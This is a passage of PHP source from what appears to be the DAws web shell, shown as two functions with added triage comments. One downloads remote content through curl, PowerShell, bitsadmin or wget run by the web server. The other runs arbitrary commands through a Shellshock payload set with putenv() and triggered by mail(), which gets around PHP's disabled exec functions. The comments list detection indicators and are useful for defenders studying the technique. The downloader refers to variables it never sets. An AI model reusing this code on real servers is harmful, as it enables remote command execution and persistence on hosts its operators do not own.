Esempio n. 1
// Fetches the body of $url, trying several transports in order: curl,
// file_get_contents_extended(), fopen_extended(), then an OS download tool
// launched through execute_command(). Returns the content, or False when the
// last fallback finds no usable tool.
//
// $url        - address to fetch; this function applies no scheme or host check
//               before handing it to any transport.
// $user_agent - optional User-Agent value, copied verbatim into the request.
//
// The helpers (installed_php, disabled_php, disabled_suhosin, bypass_suhosin,
// file_get_contents_extended, fopen_extended, execute_command) are defined
// outside this listing; their exact semantics are assumed from their names.
//
// Triage notes: this is an outbound fetch made by the web server's PHP process.
// On a host, the visible traces are requests carrying a caller-chosen
// User-Agent and, in the last fallback, child processes of the web server
// (bitsadmin.exe, powershell.exe, curl, wget). The BITS job name
// "DAwsDownloadJob" is a fixed string and can be used as an indicator.
function url_get_contents($url, $user_agent = null)
{
    //used to download the source of a webpage
    // Loose comparisons (== True / == False) are used throughout, so any
    // truthy/falsy helper return value selects the branch.
    if (installed_php("curl_version") == True && disabled_php("curl_init") == False) {
        //using curl
        // When curl_init is reported as blocked by Suhosin, the call is routed
        // through bypass_suhosin() instead (helper not shown here).
        if (disabled_suhosin("curl_init") == False) {
            $ch = curl_init(str_replace(" ", "%20", $url));
        } else {
            $ch = bypass_suhosin("curl_init", str_replace(" ", "%20", $url));
        }
        // CURLOPT_URL is set again with the unmodified $url, which replaces the
        // space-encoded URL passed to curl_init above.
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        if ($user_agent != null) {
            //used by shellshock (method 2)
            // The header value is attacker-chosen; unusual User-Agent strings
            // (e.g. starting with "() {") in outbound or inbound logs are worth alerting on.
            curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
        }
        // No timeout, protocol restriction or redirect policy is configured on
        // this handle. The result is returned as-is, so a failed transfer
        // returns false here without trying the later fallbacks.
        $content = curl_exec($ch);
        curl_close($ch);
        return $content;
    }
    //for file_get_contents and fopen
    // $user_agent is interpolated straight into the header string, CRLF
    // included, with no filtering of embedded line breaks.
    if ($user_agent != null) {
        $opts = array('http' => array('header' => "User-Agent: {$user_agent}\r\n"));
        $context = stream_context_create($opts);
    } else {
        $context = null;
    }
    //using file_get_contents
    // "!= False" is a loose test: an empty body or "0" also counts as failure
    // and falls through to the next method.
    $content = file_get_contents_extended($url, True, $context);
    if ($content != False) {
        return $content;
    }
    //using fopen
    $fp = fopen_extended($url, "r", True, $context);
    if ($fp != False) {
        // NOTE(review): filesize() is called on $url itself; PHP's http wrapper
        // does not support stat, so for remote URLs this length is unlikely to
        // be valid - confirm against fopen_extended().
        $content = fread($fp, filesize($url));
        fclose($fp);
        return $content;
    }
    //using system commands (no need to apply shellshock here since we're already using system commands...)
    // Platform is taken from session state set elsewhere.
    // NOTE(review): $link and $location are never assigned in this function, so
    // as written the command strings below interpolate undefined variables.
    // The command lines are built by plain string interpolation, with no
    // argument escaping.
    if ($_SESSION["windows"] == True) {
        // execute_command(<name>, True) presumably probes whether the tool
        // exists - verify against its definition.
        if (execute_command("bitsadmin", True) == True) {
            //bitsadmin is a nice choice here
            return execute_command("bitsadmin.exe /Transfer DAwsDownloadJob {$link} {$location} > null; type {$location}");
        } else {
            // strpos() returning 0 (match at offset 0) is treated as "not
            // found" by this truthiness test.
            if (strpos(execute_command("powershell.exe"), "Windows PowerShell")) {
                //powershell comes next
                return execute_command("powershell.exe Invoke-WebRequest {$link} -OutFile {$location} > null; type {$location}");
            } else {
                return False;
                //sadly, nothing worked
            }
        }
    } else {
        //curl or wget for Linux
        if (execute_command("curl", True) == True) {
            return execute_command("curl {$link} -o {$location} 2>&1; cat {$location}");
        } else {
            if (execute_command("wget", True) == True) {
                return execute_command("wget {$link} -O {$location} 2>&1; cat {$location}");
            } else {
                return False;
            }
        }
    }
}
Esempio n. 2
// Runs $command without calling any PHP process-execution function: the
// command is placed in an environment variable whose value begins with a
// Shellshock-style function definition ("() { x; };"), and mail() is then
// called so that PHP spawns an external mailer. Output is captured through a
// temporary file and returned as a string ("" when no file was produced).
//
// $command - shell command text, interpolated unescaped into the variable.
//
// Triage notes: the visible artifacts are an environment variable named
// PHP_LOL whose value starts with "() {", a mail() call addressed to
// a@127.0.0.1 with empty subject/body and the extra parameter "-bv", and
// short-lived "<n>.data" files (n = 1..1000) in the directory held in
// $_SESSION["daws_directory"]. The technique presumably only has an effect
// where the shell started by mail() still evaluates function definitions taken
// from environment values; a patched bash, or putenv/mail listed in
// disable_functions, removes the path.
function shsh($command)
{
    // rand(1, 1000) gives at most 1000 possible names, so concurrent calls can
    // collide and the file name is guessable.
    $filename = $_SESSION["daws_directory"] . rand(1, 1000) . ".data";
    // stdout and stderr of the command are redirected into $filename.
    putenv("PHP_LOL=() { x; }; {$command} > {$filename} 2>&1");
    // The fifth argument is handed to the configured sendmail binary as
    // additional command-line parameters; the message itself is empty.
    mail("a@127.0.0.1", "", "", "", "-bv");
    if (file_exists($filename)) {
        // Loose "== False": an empty output file is also treated as a failed
        // read and goes through the fopen fallback.
        if (($content = file_get_contents_extended($filename)) == False) {
            // NOTE(review): the fopen_extended() result is not checked before
            // fread()/fclose(). htmlspecialchars() is applied only on this
            // fallback path, so the caller gets raw output from the primary
            // path and HTML-escaped output from this one.
            $fp = fopen_extended($filename, "r");
            $content = htmlspecialchars(fread($fp, filesize($filename)));
            fclose($fp);
        }
        // The capture file is deleted after reading, so it exists on disk only
        // briefly.
        unlink($filename);
    } else {
        $content = "";
    }
    return $content;
}